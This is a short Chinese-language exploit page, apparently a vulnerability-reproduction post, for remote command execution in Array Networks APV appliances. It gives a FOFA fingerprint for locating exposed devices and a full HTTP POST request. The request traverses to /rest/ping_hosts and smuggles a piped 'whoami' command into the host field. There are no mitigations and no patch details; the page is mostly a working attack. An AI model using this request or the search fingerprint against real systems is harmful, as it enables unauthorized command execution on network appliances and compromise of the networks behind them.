登录 白背景

Networks APV存在远程命令执行

一、漏洞简介

<font style="color:rgb(47, 48, 52);">Networks APV存在远程命令执行</font>

二、影响版本

  • Networks APV

三、资产测绘

  • fofabody="APV WebUI"
  • 特征

1726851789050-8ab36f97-59f5-4bc9-bcf8-9cb98753e57a.png

四、漏洞复现

POST /restapi/../rest/ping_hosts HTTP/1.1
Host: 
Cookie: django_language=en; csrftoken=HhlrckA9OSFlSiM8WKBk9KhbN5hzdJYP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

["baidu.com| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW

1726851827502-476f041c-5e6e-41a0-8c27-4cc820087531.png

原文: https://www.yuque.com/xiaokp7/ocvun2/qg98ervbgzy1egfp